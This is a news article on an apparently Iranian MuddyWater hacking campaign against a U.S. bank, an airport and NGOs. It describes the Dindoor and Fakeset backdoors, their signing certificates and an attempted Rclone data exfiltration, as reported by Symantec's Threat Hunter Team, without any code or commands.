In a concerning development that underscores the escalating cyber threat landscape, several U.S. companies have fallen victim to the Iranian hacking group known as MuddyWater. This campaign, which commenced in early February, has persisted in the wake of significant U.S. and Israeli military actions against Iran, raising alarms across various sectors.
The recent activities came to light through investigations conducted by the Threat Hunter Team at Broadcom’s Symantec and Carbon Black. These experts have identified a range of potential targets, which include a U.S. bank, a U.S. airport, and multiple non-governmental organizations operating in both the United States and Canada. Additionally, the Israeli branch of a U.S. software company that caters to the defense and aerospace industries has also encountered suspicious network activity. Such findings were comprehensively detailed in a release issued by the Threat Hunter Team on March 5.
Central to this campaign is the introduction of a previously unidentified backdoor, named “Dindoor” by cybersecurity researchers. This backdoor was detected operating within the networks of many of the affected organizations, highlighting the significant risk posed to vital infrastructures and the broader cybersecurity environment.
The Dindoor backdoor has raised eyebrows due to its sophisticated execution method, which involves leveraging Deno, a secure runtime environment designed for JavaScript and TypeScript. This approach allows the malware to operate effectively while evading traditional detection measures. Intriguingly, the backdoor was signed with a certificate attributed to an individual named “Amy Cherne,” indicating a potential operational pattern for the attackers who look to maintain a level of anonymity through legitimate-seeming credentials.
Investigations revealed additional alarming behaviors, including an attempt to exfiltrate sensitive data from the Israeli outpost of the software company. This was reportedly facilitated using Rclone, a well-known command-line tool utilized for managing files in cloud storage environments. Although the extent of the data breach remains uncertain, the implications of such an attempt are significant, suggesting that sensitive information may have been at risk.
Furthermore, a second backdoor, referred to as “Fakeset,” was discovered within the networks of the U.S. airport. This backdoor was similarly signed by certificates linked to “Amy Cherne” and another individual named “Donald Gay.” The mention of the Gay certificate is noteworthy; it has been previously associated with malware traced back to MuddyWater. The group has been active since 2017 and is said to have ties to the Iranian Ministry of Intelligence and Security, also known by various names, including Seedworm and Temp Zagros.
The Fakeset backdoor was reportedly downloaded from two servers operated by Backblaze, a cloud storage provider, which raises further questions about the security measures in place at third-party providers. Adding to the complexity, the Donald Gay certificate has also been previously associated with malware categorized as ‘Stagecomp,’ which is known to download the Darkcomp backdoor. Such connections reinforce the notion that MuddyWater is leveraging a designed and systematic approach to blend in legitimate operations with malicious intent.
Despite the absence of the Stagecomp and Darkcomp malware on the exposed networks, the usage of identical certificates across multiple instances suggests the fingerprints of MuddyWater are firmly present. The Threat Hunter Team has expressed concern, indicating that while they have been able to disrupt some breaches, other organizations may still remain vulnerable to similar attacks. This ongoing threat highlights the need for continuous vigilance and enhanced cybersecurity measures across all sectors, particularly those that might be targeted due to their critical roles in the economy and national security.
Cybersecurity experts are urging organizations to remain alert and proactive in safeguarding their networks, emphasizing the dynamic nature of the threat landscape and the necessity for awareness and adaptability in responding to emerging cyber risks. As the global geopolitical climate evolves, the intersection of military actions and cyber warfare is likely to intensify, requiring concerted efforts to fortify defenses against such sophisticated adversaries.